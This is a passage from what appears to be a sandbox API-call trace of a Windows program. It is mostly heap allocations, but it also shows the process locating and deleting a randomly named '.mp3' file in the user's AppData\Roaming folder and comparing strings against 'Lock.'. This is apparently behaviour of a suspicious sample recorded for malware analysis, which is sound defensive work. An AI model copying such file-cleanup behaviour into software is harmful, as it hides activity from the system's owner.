dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3517500 | out: hHeap=0x25c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0200.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0200.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0200.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.708] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0200.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0200.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0200.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0200.709] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0200.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0200.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0200.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0200.709] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0200.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0200.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0200.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0200.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0200.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0200.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0200.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0200.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0200.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x88) returned 0x2420898 [0200.712] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/k3zAUT-8EHVGD9wmf.mp3", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k3zAUT-8EHVGD9wmf.mp3", lpFilePart=0x8bedfc*="k3zAUT-8EHVGD9wmf.mp3") returned 0x43 [0200.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0200.712] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k3zAUT-8EHVGD9wmf.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\k3zaut-8ehvgd9wmf.mp3")) returned 0x2020 [0200.712] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k3zAUT-8EHVGD9wmf.mp3", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20c504d0, ftCreationTime.dwHighDateTime=0x1d4cd1f, ftLastAccessTime.dwLowDateTime=0x89e0af20, ftLastAccessTime.dwHighDateTime=0x1d4d033, ftLastWriteTime.dwLowDateTime=0x89e0af20, ftLastWriteTime.dwHighDateTime=0x1d4d033, nFileSizeHigh=0x0, nFileSizeLow=0x10dbe, dwReserved0=0xc99, dwReserved1=0x4, cFileName="k3zAUT-8EHVGD9wmf.mp3", cAlternateFileName="K3ZAUT~1.MP3")) returned 0xaa58e0 [0200.712] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k3zAUT-8EHVGD9wmf.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\k3zaut-8ehvgd9wmf.mp3")) returned 1 [0200.714] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20c504d0, ftCreationTime.dwHighDateTime=0x1d4cd1f, ftLastAccessTime.dwLowDateTime=0x89e0af20, ftLastAccessTime.dwHighDateTime=0x1d4d033, ftLastWriteTime.dwLowDateTime=0x89e0af20, ftLastWriteTime.dwHighDateTime=0x1d4d033, nFileSizeHigh=0x0, nFileSizeLow=0x10dbe, dwReserved0=0xc99, dwReserved1=0x4, cFileName="k3zAUT-8EHVGD9wmf.mp3", cAlternateFileName="K3ZAUT~1.MP3")) returned 0 [0200.714] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0200.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.714] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0200.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0200.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0200.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0200.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0200.715] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0200.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0200.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0200.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0200.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.715] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0200.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0200.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0200.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0200.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0200.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0200.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0200.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0200.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0200.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0200.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0200.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0200.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0200.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0200.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x88) returned 0x2420898 [0200.718] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/k3zAUT-8EHVGD9wmf.mp3", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k3zAUT-8EHVGD9wmf.mp3", lpFilePart=0x8bf658*="k3zAUT-8EHVGD9wmf.mp3") returned 0x43 [0200.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0200.718] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\k3zAUT-8EHVGD9wmf.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\k3zaut-8ehvgd9wmf.mp3")) returned 0xffffffff [0200.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.718] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0200.718] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.718] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0200.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0200.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0200.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0200.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0200.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0200.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0200.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Macromedia", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="acromedia", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cromedia", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="romedia", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="omedia", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="media", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.720] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, 